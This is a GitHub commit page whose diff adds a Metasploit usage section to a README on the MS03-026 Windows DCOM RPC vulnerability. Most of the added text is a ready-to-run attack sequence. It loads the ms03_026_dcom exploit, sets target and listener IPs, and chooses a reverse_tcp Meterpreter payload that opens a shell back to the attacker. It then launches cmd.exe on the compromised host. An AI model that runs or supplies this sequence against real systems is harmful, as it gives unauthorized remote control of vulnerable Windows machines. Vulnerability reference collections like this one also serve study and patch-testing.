Skip to content

Commit cb3c806

Browse files
committed
MS03-026
1 parent 0a81214 commit cb3c806

File tree

1 file changed

+12
-0
lines changed

1 file changed

+12
-0
lines changed

Diff for: MS03-026/README.md

+12
Original file line numberDiff line numberDiff line change
@@ -5,6 +5,18 @@ MS03-026
55
Vulnerability reference:
66
* [MS03-026](https://technet.microsoft.com/library/security/ms03-026)
77

8+
## msf Usage
9+
* [YouTube-ms03 026](https://www.youtube.com/watch?v=OZwQo8kqdBM)
10+
```
11+
msf > search ms03_026
12+
msf > use exploit/windows/dcerpc/ms03_026_dcom
13+
msf exploit(ms03_026_dcom) > set RHOST 192.168.229.129
14+
msf exploit(ms03_026_dcom) > set LHOST 192.168.229.35
15+
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/reverse_tcp
16+
msf exploit(ms03_026_dcom) > exploit
17+
18+
meterpreter > execute -f cmd.exe -c -1
19+
```
820

921
## References
1022
[Microsoft Windows DCOM RPC接口长主机名远程缓冲区溢出漏洞](http://blog.chinaunix.net/uid-286494-id-2134482.html)

0 commit comments

Comments
 (0)